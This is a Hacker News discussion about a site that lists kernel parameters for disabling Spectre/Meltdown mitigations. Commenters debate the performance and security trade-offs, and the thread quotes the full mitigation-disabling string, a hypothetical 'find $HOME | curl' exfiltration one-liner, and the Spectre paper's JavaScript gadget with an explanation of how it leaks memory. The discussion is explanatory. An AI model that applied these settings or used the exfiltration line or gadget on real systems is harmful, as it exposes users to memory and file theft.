Hacker News new | past | comments | ask | show | jobs | submit login
Make Linux Fast Again (2019) (make-linux-fast-again.com)
368 points by laurentdc on April 10, 2020 | hide | past | favorite | 314 comments




TBH it's entirely in character with "make X Y again" to give some recommendations that are super straightforward and sound appealing, don't make a case that X is in fact no longer Y, completely ignore why those recommendations haven't been implemented thus far, and don't spend any time thinking about whether there's even the slightest downside to those recommendations (which are in fact super dangerous/harmful).


The most essential person in kernel dev linked this just the other day, presumably seriously, in reply to an AMA question:

    75 points · 2 days ago
    
    If my environment doesn't need to worry about
    executing malicious code and I want syscalls to
    happen as fast as possible, is there a single/simple
    option to disable all the performance killing
    hardware mitigations?

    gregkh Verified 183 points · 2 days ago
    
    https://make-linux-fast-again.com/
https://www.reddit.com/r/linux/comments/fx5e4v/im_greg_kroah...


Sure. That's a very big "if," and the most essential person in kernel dev has the ability to make that the default if he wants. There's a reason he hasn't.

(If your environment actually doesn't need to worry about executing malicious code and you want to make syscalls as fast as possible, try a unikernel or implementing your code in a kernel module. Or, depending on what you're doing, try kernel bypass to get to the devices you care about and use something like https://lwn.net/SubscriberLink/816298/4aed890ee2dbffff/ to pin your user code to certain cores and get the kernel completely out of the way. Having to transition out of user mode to access hardware instead of making plain function calls, having to change page tables between processes, etc. are all performance-killing mitigations of their own. http://www.csl.cornell.edu/~delimitrou/papers/2019.asplos.xc... found a 27x performance improvement by getting rid of the privilege boundary between userspace and kernelspace - if you really care about performance and really don't care about malicious code, why would you leave a 27x speedup on the table and worry about a small percentage improvement from these flags??)


I don't agree.

Telling people to write in kernel mode if they care about performance isn't realistic. For most people that would mean completely rewriting their code from scratch, foregoing high-level software stacks and languages, giving up on most databases, giving up on all manner of tools and techniques for high-velocity software development, giving up fault tolerance, dealing directly with fiddly hardware issues (when do I need a TLB shootdown?), etc.

Whereas disabling spectre mitigations is a one-line config change.

For use cases where local system security really doesn't matter (of which there are a lot, let's be honest), a one-line config change for a 25% (or whatever it is now) performance boost is a pretty damned good deal.


I'm not sure I agree that cases where local system security really doesn't matter and performance matters are that plentiful, but I am happy to be convinced otherwise. In particular, just about any personal computing context doesn't count - you'd have to not run mutually-untrusted third-party code. That rules out web browsers with JavaScript, that rules out Android/iOS-style independent apps, etc. Sure, if you use the web without dynamic content and you use local office suites you're fine, but on the other hand, you don't really care about performance - a 486 will deliver enough performance to read textual content and run a word processor and spreadsheet.

Gaming is a context where you care about performance and you aren't using multiple apps at once, but (and I admit this is a bit of a naive guess) I'd be surprised if it's syscall-bound. It seems like performance is likely to be I/O-bound (getting assets from disk into memory), CPU-bound, and GPU-bound, but are you really making large numbers of syscalls? (Maybe this matters in online gaming?)

So that leaves basically some specific server workloads, and at that point I think some of these techniques start to be realistic. Pinning your work onto a core and using kernel-bypass networking is a pretty straightforward technique these days. It's not quite as easy as using the kernel interfaces, but it's pretty close, and it's definitely worth investing some engineering effort into if you care about performance - you can get much more than 25% speedups.

I agree that writing in kernel mode is generally unrealistic (although if you're writing a kernel module for Linux, you still don't need to care about fiddly hardware issues - you've got the rest of Linux still running). Mostly I'd like to see more work like the paper I linked - there should be a standard build of Linux which has hardware privilege separation turned off for use in the cases where you actually can avoid hardware privilege separation (single-user VMs on cloud hosts, single-user data crunching machines, dedicated single-tenant database servers, game consoles without web browsers, ebook readers without web browsers, etc.), or at least a flag to spawn a process and leave it in ring 0. If the use cases are plentiful, this seems like it would be valuable for lots of people - and it'd also make it clear that this generally isn't an option you want on personal computers. (But I think the reason this hasn't been done in the last several decades is that there aren't actually that many use cases that are both genuinely single-user and syscall-bound.)


If you think a 486 is sufficient for reading textual content and running a word processor and spreadsheet, you haven't been paying attention to software bloat. A 486 would have a hard time just booting a modern OS, never mind the application software.


Dig up a copy of WordPerfect 6 from somewhere, no need to boot a modern OS.

(More to the point - the solution to software bloat isn't to get rid of security protections so that the bloat has room to grow.)


Could use Geoworks also. Pointy clicky on even XTs, it would absolutely fly on any 486.


> So that leaves basically some specific server workloads,

The vast majority of servers don't run any untrusted code. Servers tend to do lots of syscalls for network I/O.

> Gaming is a context where you care about performance and you aren't using multiple apps at once, but (and I admit this is a bit of a naive guess) I'd be surprised if it's syscall-bound.

I would expect that interfacing with the GPU involves a fair number of syscalls -- but admittedly I'm also guessing.


> single-user VMs on cloud hosts, single-user data crunching machines, dedicated single-tenant database servers, game consoles without web browsers, ebook readers without web browsers

This is a lot of cases. I'd love to get 25% perf back on postgres, or 25% back on my air-gapped DAW, etc. etc.


Benchmark it - your air-gapped DAW is almost certainly spending very little of its time making system calls, and depending on workload, your Postgres probably isn't either. You'll get 25% back on syscall-heavy workloads but your workloads probably aren't syscall-heavy.


I would rather just enable this stuff, honestly. Which I think is the point.


Yes, that's precisely my point - the webpage appeals to people who want easy answers whether or not the problem has easy answers.


> a 486 will deliver enough performance to read textual content and run a word processor and spreadsheet.

Are you still running Visicalc?

I have seen, used, and maintained spreadsheet applications that are irritatingly slow on eight core, i8, with 8 GB of ram, and an SSD.

Granted this was on Windows but nonetheless the idea that end users only need a 486 is ridiculous at best and probably insulting.


While we're being honest, how many programs that get written are so desperate for performance that the only thing left to do is turn off security? And are the people who are able to even make this determination the kind of people for whom making a kernel module is unrealistic?


Your comment would make sense if GP had written "but writing kernel mode code is very hard and only really smart people can do it".

But they wrote something completely different. It seems to me like you just totally ignored their comment. What's the point of that?


I didn't ignore it. My point is, the kind of people who truly need this kind of performance are already translating hotspots to assembler and so on, a kernel module is plenty practical for them. For nearly all computer users there is no excuse for turning off these mitigations.


I don't know. If I'm running an application server with only my own code on a dedicated server, and I can flip some switches to make it go faster, then that's pretty nice, no? Might save me from upgrading to a bigger (pricier) server. What am I missing?

I mean, sure, that site is nuts, it sorely needs documentation. But not every scenario needs Spectre protection.


The problem with the scenario you describe is: how will you ensure that no one ever forgets that this server is vulnerable and can never be used for certain things? And everyone on here advocating turning off the mitigations is assuming the only exploits are the ones we know about. But when has that ever been the case. If more people turn off the mitigations black hats will be invested in finding ways to exploit it we haven't realised before.


Two comments down, he says to only use that if you know exactly what you're doing, as that set is not secure for most people.


Correct, but 'geofft's criticism of it isn't great, in my opinion. Reading it makes it obvious what it does, and only a fool would disable security mitigations in a situation where it mattered. The link has significant value in being a quick and easy way to direct people to information, and it seems nonsensical to criticize it for things which don't particularly apply.


> only a fool would disable security mitigations in a situation where it mattered.

Are we reading the same HN threads on this page? I'm seeing people who I don't consider to be stupid, who obviously have some Linux knowledge, still advocating that user accounts are a waste of time for most desktops.

If anyone is smart enough and knows enough about Spectre/Meltdown to understand the risks they're taking, they are also smart enough to search online how to disable the kernel protections. The commands aren't hard to find.

If anyone is not smart enough find that information online for themselves, they also don't have enough knowledge to make an informed decision about whether or not it's safe for them to run.

In both cases, there is value in forcing users to display a modicum of knowledge about even just the fact that Spectre/Meltdown exist before we give them a command to run that turns off an important security setting. Anyone who knows anything about Spectre/Meltdown already knows that the mitigations affect performance. They should already know what to search for online without the aid of no-context commands being pasted at the top of HN.


Are we reading the same HN threads on this page? I'm seeing people who I don't consider to be stupid, who obviously have some Linux knowledge, still advocating that user accounts are a waste of time for most desktops.

A fool isn't necessarily stupid: plenty of people have knowledge yet terrible judgement.

If anyone is smart enough and knows enough about Spectre/Meltdown to understand the risks they're taking, they are also smart enough to search online how to disable the kernel protections. The commands aren't hard to find.

If anyone is not smart enough find that information online for themselves, they also don't have enough knowledge to make an informed decision about whether or not it's safe for them to run.

In both cases, there is value in forcing users to display a modicum of knowledge about even just the fact that Spectre/Meltdown exist before we give them a command to run that turns off an important security setting. Anyone who knows anything about Spectre/Meltdown already knows that the mitigations affect performance. They should already know what to search for online without the aid of no-context commands being pasted at the top of HN.

You're considering it as advice, when really it should be considered more like a doi.


> A fool isn't necessarily stupid: plenty of people have knowledge yet terrible judgement.

Then I'm not sure why you disagree with my criticism - I'm claiming that this page appeals to people who have knowledge in this matter but have not done the deep thinking to have wisdom in this matter. There are plenty of smart people who find "Make X Y again" for other values of X and Y appealing.


I'm claiming it functions more like a doi or other identifier than a sales pitch. I don't think there's a ton of deep thinking involved: there will always be someone who's willing to run a web browser as root on their main system; you can't stop people who are set on something foolish from doing it, but if you can make it more convenient for people who have valid reasons, why not?

This all might be a bit too much serious thought for what was intended as a joke initially (the site, not my comments), though.


> still advocating that user accounts are a waste of time for most desktops.

I mean, phones and tablets do fine without any user-like abstraction. You can sandbox apps without having a concept of multitenancy.


Every Android app runs as a different UID.

I'm not sure what you mean by "concept of multitenancy," but if you want to "sandbox apps," you cannot let side-channel attacks break that sandbox.


iPads do have a concept of multiple users, though only one can use it at once.


Android differentiates between user processes and root processes. I'm pretty sure iOS does as well, although maybe they've coded it as something weird.

I'm not seeing people here arguing that Linux could get by with only supporting 1 user account. I'm seeing people argue that the biggest reason they avoid running as root is just because userland applications complain about it. It's very difficult to do sandboxing if there isn't some kind of differentiation between a privileged and unprivileged process.

Regardless, Linux also doesn't really have good sandboxing by default, so I'm not completely sure what you're getting at. It's still a bad idea for people to run a Linux system as root.


iOS has a root user, that your code does not run as.


> Reading it makes it obvious what it does, and only a fool would disable security mitigations in a situation where it mattered.

I disagree. Most users do not understand how speculative side channels work or how they might be affected; many people's experience with Meltdown and Spectre is "my games got slower because of some magical speculative stuff that I don't really understand". Making an informed decision on this is hard.


I may be overestimating them, but I imagine this applies drastically less to your average Linux user who knows how to actually apply this.


The average Linux user will not understand the implications. Heck most don't even know the security trade-offs of X11 (which are relatively simple to discover and understand).

Leave the HN bubble and go to an average Linux forum. You would be surprised what kind of advise people give or what people are willing to copy and paste into their terminal ;).

This is not meant as a criticism. Most people, including many Linux users, just use their computer as a tool and will just do anything to get it running as they want.


I think you're overestimating the average Linux user.


I could see it.


Do you have an example of a situation where it does not in fact matter, and do you have a benchmark of the speedup?


Most offline systems, and many systems used only for using trusted code (which obviously bars anything with a web browser, and most internet-connected personal computing devices, among other things). Applications that equate roughly to "Scientific number-crunching" for example are generally systems where security doesn't matter much.

There's a case to be made for gaming, and the mitigations if I remember correctly definitely ding performance on quite a few games, but because most computers used for games have significant amounts of sensitive information on them, among other things, I don't think it really holds well.

Benchmarks (I really dislike linking to this site, but given it did a bunch of benchmarks, it's not the worst thing, I guess):

'Up to 50% performance loss!' is obviously clickbait, and I disagree with a lot of the wording & conclusions & so on, but there's definitely some workloads where the trade-off makes sense.

https://www.phoronix.com/scan.php?page=article&item=linux-42...

https://www.phoronix.com/scan.php?page=article&item=linux-42...

Warning about those benchmarks, though: they're of a rather old kernel version, I imagine they tank performance less now. However, given that 5x has been performing way worse to my knowledge than 4x, 4x is probably what most people would be using for these sorts of things.

EDIT, added section below:

Ah, here we go; how it's effecting modern stuff:

https://www.phoronix.com/scan.php?page=article&item=spectre-...

The mitigations ding it a reasonable amount for a substantial amount of workloads, though it's not as intense as it used to be.


Are systems used for "scientific number-crunching" really applicable in this case? While some departments may have those on a separate network, not connected to the internet at large, I have never heard of a system employed for research tasks being completely air gapped. Otherwise, accessing and working on data would be prohibitively harder. Would such a trade-off be worth the potential gains by deactivating mitigations?

Also, may I ask why you dislike Phoronix? I personally enjoy their articles and the benchmark suite they have developed seems very well-rounded and transparent. I wouldn't count the statement concerning the ~50% increase in time it takes to complete a certain task on 4.20 as clickbait, considering it was never used in the linked articles title to hock readers and gain clicks.

Honestly, I have yet to see a large and popular enough use-case that allows for a both completely air gapped system, whilst also heavily benefiting from disabling mitigation to such an extent, that an admin couldn't just lock up the flags required. If I, as an admin, made the conscious choice of going so far as to disable these patches, I would also want to at least re-read whether this is truly significantly advantageous, rather than copying a line from a website with no context or further information on the current state and impact on performance.


It'd be nice to be able to easily boot into, or toggle into, a performance optimized, disabled mitigations environment to do something while offline.. many computer uses don't require being connected to other computers. I've gotten into the habit of hotplugging my Ethernet connection, personally.


You can actually do that fairly easily, just add the parameters linked to a second boot entry in GRUB.

However, I would very much not advise doing so, as I still am unaware of any task that can both, be done without the need for a network connection, while also being significantly slowed down by the mitigations, after recent improvements to the kernel and software. Basically, the potential benefit is very low in a lot of tasks, whilst requiring additional security measures (ideally fully air-gapped) and that you reboot the system every time you'd do such a task.

Also note that, in theory, just being temporarily offline may not shield from being exploited fully.


As an example (the only case that I've identified personally), if your curious, I have a (windows; Intel q6600) box that I use for gaming occasionally. Single player game I like, Total War: Shogun 2, runs at about 55 fps (benchmark) pre-Meltdown/Spectre/etc. Now it gets ~22 fps. I can use https://www.grc.com/inspectre.htm to toggle some mitigations to get it playable again.


...doesn't that exactly answer the question that was asked??


Very well said.

I would add that it is also needlessly antagonistic in addition to be being in poor taste.


To be clear: I mean that using "Make X Y Again" is antagonistic and in poor taste. GP of this comment is well stated and accurate.


[flagged]


The issue isn't bad taste, it's starting flamewars. Please don't.

https://news.ycombinator.com/newsguidelines.html


I'm not aware of any examples where "Make X Y Again" was a positive thing.


We're all smart enough to read between the lines here- although you've barely avoided saying 'Trump' this is very clearly a political message

One of the reasons I like HN is it generally avoids such shallow political talk.


Is there a possibility this whole project is in jest? It's called "Make Linux Fast Again", and it deliberately disables reasonable security measures to achieve its goal. Could be a political statement in the negative!


I don't, know the website went away really fast. :-)

I could see legitimate use for un-networked computers.


The crisis has changed people's online behavior, and the shallow culture of other sites is becoming normalized on HN. Please flag where appropriate.


[flagged]


Please take the time to read this over:

https://news.ycombinator.com/newsguidelines.html


There isn't a high bar of 'deepness' required here, but thinly veiled political insults with zero substance don't meet it.

Ill pull something out of the guidelines jshrevek posted for those who don't want to read through the whole thing

> Please don't use Hacker News for political or ideological battle. That destroys the curiosity this site exists for.

I'll add that using the term 'gross idiocy' also violates these guidelines.


Thank you for responding politely and meaningfully to the snarky, partisan flamebait.


The quality of comments on hacker news is due to the high bar for thoughtfulness and respect. Not from a restriction blocking any "political" discussion.

The linked content (disable security features to improve performance) is very clearly a relevant topic for hacker news and the apparent association between the linked domain and Trump's infamous catch-phrase seems like an intentional choice that is worth discussing.


>linked content (disable security features to improve performance) is very clearly a relevant topic for hacker

True, but not relevant to issues of partisanship and ideological battle.

>domain and Trump's infamous catch-phrase seems like an intentional choice that is worth discussing.

Theoretically, maybe. In practice, well take a look at the actual quality of the comments being made.


There is a restriction actually. This is pulled from the guidelines-

> Please don't use Hacker News for political or ideological battle. That destroys the curiosity this site exists for.


It is possible to discuss a political topic without the discussion becoming a "political or ideological battle".

It's definitely challenging, but it is possible.


I think it is a real problem that someone should try to solve. I visit a good number of expert communities and they all tend to be highly on topic. This is a good thing without question but I've often noticed the community is completely oblivious to what happens outside their bubble. I suspect most of the accidental battles are from being years behind on the discussion with the people they've talked with every day for the last decade or so.

I don't claim to have a solution. Programming philosophy or Programming politics do not seem very attractive but I do suspect there to be a big adventure behind those curtains. It's not like code is not political, lacks a philosophy or ideology. But the best we could do was "stop spying on me!"? hah


It is certainly very possible to do that, and it almost always requires sharing new information that relates to the context of the discussion.


Yes, that's the point of this site - if your workflow is hurt by the perf impact of mitigations and SPECTRE & friends are not a credible attack, for instance because you disable JS by default, then you can just curl and pipe this to your kernel parameters


To be clear, SPECTRE leaks privileged memory at an OS-level -- up to in some cases allowing arbitrary virtual memory reads.

While Javascript is the most likely attack vector for most people, you should not use this command on a system that's running untrusted code from anywhere in any context, and you should consider moving sensitive information like passwords off of the computer.

I use uMatrix to disable Javascript by default on every site I visit, and I still would not feel safe running this command on anything other than a single-purpose device.

That's not to say that there would never be a good reason to run it. A very imprecise, easy test I would propose is, "is your Linux system vetted enough or just unimportant enough that you would feel comfortable getting rid of users and running all of your software as root?" In which case, SPECTRE & friends is probably not a credible threat to you on that machine.


Only if you are using multiple accounts and you are concerned about privilege escalation. But let's be honest, most people use only one user account, with sudo rights, and probably without sudo password because inserting them 1000 times a day is a pain.

Thus every program without doing anything can access everything, it just needs to spawn a process to read stuff arount the FS, or in the assumption that yu have sudo without password, just gain root access and read /dev/mem. That is more simple than doing a SPECTRE attack.

So who needs these mitigations? Who runs containers or sandbox where you want untrusted code to be isolated. Browsers are an example, but they have specific mitigations anyway, and doing an attack from JS is not that simple really. So really I'm not so worried about SPECTRE for a typical desktop usage.

Of course if we talk about servers they are very important.


> But let's be honest, most people use only one user account, with sudo rights, and probably without sudo password because inserting them 1000 times a day is a pain.

The solution is to teach those users how to use sudo properly, not to teach them to be even more insecure than they already are.

It's like saying, "I don't need to wear a seatbelt because I already drive my car at 90mph everywhere, so the seatbelt wouldn't make a difference in a crash anyway."

If you have sudo set up without a password, fix that crud! This is not a new concept, the Linux community has been warning people about unprotected root access for over a decade.


The concept is crud. For a personal computing device at least. Why should i bother moving along lines which have nothing in common AT ALL with personal use, instead historically shaped for reasons of accountabiliy and billing?


They are remotely exploitable without the mitigations in place.

https://mlq.me/download/netspectre.pdf


> you should not use this command on a system that's running untrusted code from anywhere in any context

I don't really understand this point.

Any program you download from the internet, say, VLC or Kodi or a game emulator or whatever, can already do `find $HOME | curl -F my.totally-legitimate.website` and read the memory of all the processes of your user with a script that'd involve `ps -u` and `/proc/yourpid/maps`, mitigations or not, unless you use something like QubesOS (but most people do not).

Leaking bits with spectre would be a super long process versus... just doing that if you could already get the user to download your code.


> Any program you download from the internet, say, VLC or Kodi or a game emulator or whatever, can already do `find $HOME | curl -F my.totally-legitimate.website` and read the memory of all the processes of your user

There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?

I'm not going to argue Linux sandboxing is awesome -- it's very clearly not. But user permissions are big part of what security we do have. Spectre/Meltdown also limit the effectiveness of the newer sandboxing features we're getting from packaging systems like Flatpack. Maybe you're not running any of that stuff on your system, but...

I'm seeing a lot of people here being kind of blasé about the potential risks, arguing that they only need to protect themselves from websites, and I am skeptical that all of those people actually understand the full extent of these vulnerabilities.


On a single owner desktop system, isn't kernel memory strictly less interesting than user memory, for reads? All of the important things, like passwords and emails and secret keys, are in user space memory or in the user readable file system, generally...


Disk decryption passwords / keys could show up in kernel memory.


which is used to get

> All of the important things, like passwords and emails and secret keys, are in user space memory or in the user readable file system, generally...

In this scenario in OP's comment, user accessible stuffs are still more interesting than kernel things.


> Why aren't you running all your software as root?

A lot of software gets snippy when you try to run them as root. That said, the biggest advantage of non-root is protecting myself from fucking up my own system.

XKCD relevant: https://xkcd.com/1200/

If somebody gets access to my user account, they can't change my system files, but they can literally buy an entire new PC with my money, on which they can then presumably change whatever system files they want. I hope that example outlines how pointless root protection is in a modern consumer PC.


> they can't change my system files, but they can literally buy an entire new PC with my money

This is a problem that's fixable with additional security additions, but only if you haven't granted everyone root access.

You can set up ssh with appropriate privileges and chown private keys so that they require a password to access. You can run certain programs like games as unprivileged users without full access to your $HOME directory. You can start using Flatpak and Wayland. Unless you have a Spectre/Meltdown vulnerability, in which case most of that is pointless.

I don't understand the mentality that says, "my system is broadly insecure, so I'd better make it impossible to secure." I mention this elsewhere[0], but a big part of getting to a secure Linux system is patching the holes we can right now.

[0]: https://news.ycombinator.com/item?id=22833614


Yeah but I will do none of those things. So why also make my system slow on top of insecure?

Broadly, my security profile is "if a remote user can execute code on my system, I have already as lost as hard as it's possible to lose."


> There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?

Only somewhat devil's advocate: Software running as root can accidentally delete important files. I run software as non-root to prevent myself from my silly mistakes. You don't accidentally leak information through SPECTRE.


> There are variants of Spectre and Meltdown that expose kernel memory. If you're really in a position where you don't think that makes a difference, then why are you messing around with user accounts in the first place? Why aren't you running all your software as root?

I'll be honest, because that's the default on Linux (I'd make the effort to do that for my personal things at least - I'd never do that on computers with shared accounts or with work-related data).

https://xkcd.com/1200 is as true as it ever was.


How can they read your email if you have locked your computer?


"While I'm logged in"


It's not that the vulnerability isn't dangerous. It's that there are already _so_ many other vulnerabilities that outside of maybe JavaScript it doesn't make a whole lot of difference. Desktop linux security is basically this: https://i.redd.it/bqk0cv1r56c41.png Why worry about a whole in the fence gate when anyone can just walk around it?


The problem is that there are like 4 or 5 efforts going on in Linux right now to make things more secure. But they're all kind of targeted, and we need all of them to coordinate with each other, so individually each of them gets dismissed because "what's the point of plugging one hole?"

People mention $HOME access. This is something that we're trying to solve with Flatpack: filesystem access should be sandboxed by default. But that requires coordination with desktop environments like Gnome, otherwise everyone just grants programs anything they want because the UX is bad.

And then on top of that we have X11, which is its own mess, and we're trying to address that with Wayland. But Wayland isn't perfect yet for desktop recording, and there's not a ton of effort from software like Emacs to get off of X and onto Wayland because of "what's the point?" arguments. So Flatpack becomes a lot less valuable because X11 keylogging is so easy.

Then we have just flat-out bad user security, where people are setting up sudo without a password. So process isolation becomes a lot less valuable because programs can just manipulate the raw filesystem.

And then we have Spectre/Meltdown leaking passwords, but who cares because "people don't set passwords anyway."?

And whenever a group of people get together and propose any fixes in isolation, there is inevitably someone in the Linux community who will stand up and say, "Look, Wayland is pointless because someone wrote a keylogger[0]. Why are we spending any time fixing this stuff?"

Imagine you are on a boat with 10 holes in the bottom, all of them leaking water. If you want to fix that problem, there is inevitably going to be a period where 5 of the holes are patched and 5 of them aren't. And if you get to that point and start re-opening the holes that did get patched, it's going to be very hard to make any more progress.

[0]: https://github.com/Aishou/wayland-keylogger


It's not that the desktop "linux" developers don't care about security. But there's simply not enough manpower behind it. The linux kernel is only secure because that's what the cloud companies with a shit ton of money care about. They don't care about desktop.


I don't think reality is quite like your little image here. There is no absolute security, ever, but we can create layers of difficulty for attackers as appropriate for our threat models. Someone with a reasonable amount of expertise and caution can use Linux on a personal computer in ways that make it very nearly impossible for a typical "criminal level" hacker (as opposed to nation-state level hacker) to steal information from them. Yes, that means not downloading arbitrary executables from the net, among other things, and certainly not running arbitrary code from the net like Javascript. When you do need to run something untrusted, run it isolated in a VM, etc. If you do these kinds of things, then it makes sense to also use stuff like Spectre mitigations.


That's not necessarily true, there's been several security layers added these past few years. The YAMA LSM prevents user processes from reading the memory of processes that are not its children. It's already enabled by default in Ubuntu (but not Fedora, they decided to keep it disabled by default so that user gdb still works).

There are definitely still holes in the Linux security model, especially regarding file access (any user process having access to all the user's files is far too broad), but that doesn't mean we should just leave known vulnerabilities open, especially since an attacker may not have all methods of attack available.


Don't browsers fudge the accuracy of the available clocks already to mitigate SPECTRE?


I would appreciate someone else who knows more than me about the current state of these attacks and more than me about Linux security in general answering this question. Take what I'm about to say with a grain of salt.

My understanding is that Firefox still reduces timer accuracy, Chrome did, but increased timer accuracy again after adding other protections. I'm not sure if Chrome's protections rely on Meltdown vulnerabilities being patched on the OS level or not. It's been a while since I checked back on what the status was there, so I might be wrong.

There are also some concerns about shared memory buffers, which is why I think some of the features around them haven't been enabled in WASM yet. I haven't checked the status on that stuff in a while either.

In any case, for a vulnerability of this scale I bias towards saying people should practice defense in depth. Sometimes browsers have bugs in them, and this would be a particularly bad one. And again, there are userland native apps and systems and package managers that people need to worry about that go beyond browsers.


Yes, but this doesn’t actually fix the issue; it just makes exploiting it harder. Fundamentally, even if you fudge clocks you can still average out things with enough measurements, and if you remove all of them you can busyloop and count iterations of that instead as a “timer”.


They had to disable shared memory APIs for threading in JavaScript, because those could be used to implement accurate enough "clocks". That was a temporary measure and last I checked some browsers enabled them again once the memory access itself was patched. So by removing the memory access patch you are once again fully vulnerable.


This just makes the attack harder, i was told. There are arguably plenty of ways to measure time within javascript without even a clock, you cannot disable that.


Reducing timer resolution was done early on as a quick reaction by browser developers when Spectre & Meltdown were first publicized.

All an attacker needs to do is distinguish between a cached and non-cached memory read - i.e., was accessing some variable "faster" or "slower". There are lots and lots of ways to measure this. A good whitepaper is "Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in Javascript".

The TLDR is that timer resolution reduction is ineffective as a speculative attack mitigation.


> Yes, that's the point of this site

Sorry - was just providing a bit more information for those of us who didn't immediately grok the point of a site which is literally just:

noibrs noibpb nopti nospectre_v2 nospectre_v1 l1tf=off nospec_store_bypass_disable no_stf_barrier mds=off tsx=on tsx_async_abort=off mitigations=off


hm, I'm not a native english speaker - was my tone incorrect ? was just trying to add more context


I thought your tone was fine, but the phrase "Yes, that's the point..." can sometimes (not always) be associated with a condescending, sometimes even impatient, tone. It's not intrinsic to the phrase, it depends on what the reader may associate with the phrase. (I'm also not saying this actually happened in this case, I'm just speaking generally.)


Agreed, and the part that may be difficult for a non-native speaker to get is what other words would give the same meaning but seem less confrontational: e.g. "Yes, that's the intent..." conveys the same meaning but with a milder tone. I think with "point" there's the suggestion of "You missed the point," which is an insult.


I think you're fine! But just to try and deconstruct... similar phrasing:

> Yes... that's the entire point of xyz -_-;

...is semi-frequently used to imply "what you said is obvious" with a sort of... dismissive undertone, which might've been what miles was reacting to. Breaking the phrase up a bit more and making it a bit more casual/chipper somehow feels harder to misinterpret this way? Even without resorting to emoji as I have here:

> Yep! That's the point of xyz :)

But I could see myself using your phrasing as a native speaker, so I wouldn't worry about it too much ¯\_(ツ)_/¯


> SPECTRE & friends are not a credible attack, for instance because you disable JS by default

That's... an extremely optimistic perspective on what's running on your system. Disabling JS in browser tab contexts (even if it's universal and not just "by default") is going to cover a pretty small percentage of SPECTRE et al. vectors.


What other vectors are there? Assuming that I trust my local software (because if I don't then spectre is the least of my problems).


> just curl and pipe this to your kernel parameters

;)


well, you're already trusting random magic incantations found on internet so...


That reminds me of this talk: https://www.youtube.com/watch?v=lKXe3HUG2l4


> curl and pipe this to your kernel parameters

What an incredibly convenient idea that is!

.....

AAAAAAAaaaaaaaa [screams in infosec]


Can you explain why this is dangerous? Is it because there could be executable code in what's returned?


Yes, and since it's just a URL even if you perform an audit it could have malicious code injected at any time in the future without your knowledge.


Which is perfectly fine for personal use or in a data center where you control the whole server.


Personal use usually involves a web browser, which usually executes untrusted javascript from the web. You won't find me disabling these mitigations on any of my workstations any time soon.


Is there a poc of an attack that works on an up-to-date browser iff these mitigations are disabled?


Yes, the original Javascript exploit from the paper still works, because the browser cannot mitigate this attack without just disabling parts of Javascript entirely which breaks Javascript.

With all current kernels built to mitigate these exploits, and all sane people running those kernels, there's no benefit in patching the browsers too, even if it were somehow possible, which for all intents and purposes it is not.

https://react-etc.net/page/meltdown-spectre-javascript-explo...


Note, browsers did disable some js features to mitigate -

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Refe...

Well the link you provide doesnt use SharedArrayBuffer, it is used as part of the exploit if you read the original paper (as a method to make a high resolution timer)


You've linked an "example" but what I'm looking for is a complete poc that I can execute to see for myself that it works.


You won't find a real world exploit that does something like reading a password, SSH key, etc. It would be like winning the lottery, then getting your money out 1 penny at a time for the next several decades. You can find "academic" PoC exploits that work under pristine conditions.


I don't see how that code exploits anything?


Can you or someone explain that exploit? Where is it reading out of bounds data?


I'm not super familar with spectre, but i think the linked page is misinterpreting the vuln (hopefully someone will correct me if im totally out to lunch).

So the original js from the spectre paper was:

  if (index < simpleByteArray.length) {
    index = simpleByteArray[index | 0];
    index = (((index * 4096)|0) & (32*1024*1024-1))|0;
    localJunk ˆ= probeTable[index|0]|0;
  }

The code looking a bit weird (all the |0) to ensure Chrome JITs it the correct way. My understanding of what happens, the loop goes a bunch of times while index is inside the simple byte array. After the last iteration, the processor speculatively executes the loop one more time than it should (branch misprediction). It eventually figures out the loop should end and undos the speculative execution. However that only happens after the loop has already started executing (where its not supposed to). During this improper execution, index is after the end of SimpleByteArray. index = simpleByteArray[index | 0] is then executed. index is now set to the value of some memory in the current process that the current JS is not supposed to access. index = (((index * 4096)|0) & (3210241024-1))|0; is executed to spread the memory value out (we need all possible values to be in a separate cache line in probeTable later). We now execute localJunk ˆ= probeTable[index|0]|0;. localJunk is just there to prevent dead code elimination optimization. Since we are now indexing into probeTable at 4096 byte intervals, we have to fetch that value from memory. It then gets cached by processor. This all gets undone by the processor when it realizes that the branch was incorrect, except the cache changes are not undone. If we access anything else in the same 4096 bytes later on, the access is a tiny bit quicker.

The exploit is, that after all that setup, we try accessing each 4096 byte region of probeTable, to see which one is fastest. We can than conclude that was the value of index during the branch misprediction and thus the value of that byte of memory we aren't supposed to see.

If we do this a lot, we can read the rest of the process's memory. The hope is we will be able to find cookies related to other websites currently open, and then do evil things with them.

This attack no longer works because browsers disabled SharedArrayBuffer, which provided the really precise timer. The timing difference is very small so you need a very fine grained timer to make it work. It should also be noted that this variant of spectre is in-process only. Some versions of meltdown/spectre allow accessing memory of other processes, but as far as i understand this version is in process only.

I hope that made sense, and i hope i didnt screw that up.


Thank you!

> to see which one is fastest.

The timing is extremely important and not at all visible in the code (which makes sense, since it's a side-channel attack.)


Eh. The amount of performance you sacrifice in order to mitigate the very small chance of actually running across any javascript in the wild that a) successfully exploits you, and b) actually retrieves anything worthwhile, just isn't worth it. It's such a tiny risk that it's really only worth mitigating against if you're paranoid or handling particularly sensitive information.


Again, JS can no longer perform this exploit. Browser vendors have disabled (made inoperable) high resolution timing. It's now at 1ms resolution. Not enough timing resolution to mount the attack.


Wasn't there a POC of spectre that used a counter in a webworker as a timer?


postMessage cannot provide a reliable timing signal since it goes on the task queue on the receiving end (in the main thread) along with other pending events, and even if there were no other events, there is latency noise in postMessage due to the fact that the web worker is not the only thread running on the CPU. Some suggest that the attack would only take more time as the attacker has to collect a bigger sample, and factor out the noise, but I haven't seen a public exploit based on that.

The other angle of attack that used to be viable was documented in this HN comment: https://news.ycombinator.com/item?id=14057091

But AFAIK all browsers have disabled SAB, e.g. see: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Refe...

EDIT:

Chrome has re-enabled SAB, with mitigations.


Ah, bloat as a security feature. I keep learning new things here!


the minimum essential behavior to implement a feature is one that takes into consideration keeping the user safe from attacks... you could call that bloat, but I wouldn't be sarcastic about it: if you can make the mitigations more concise, you can contribute your ideas, no one stopping you.


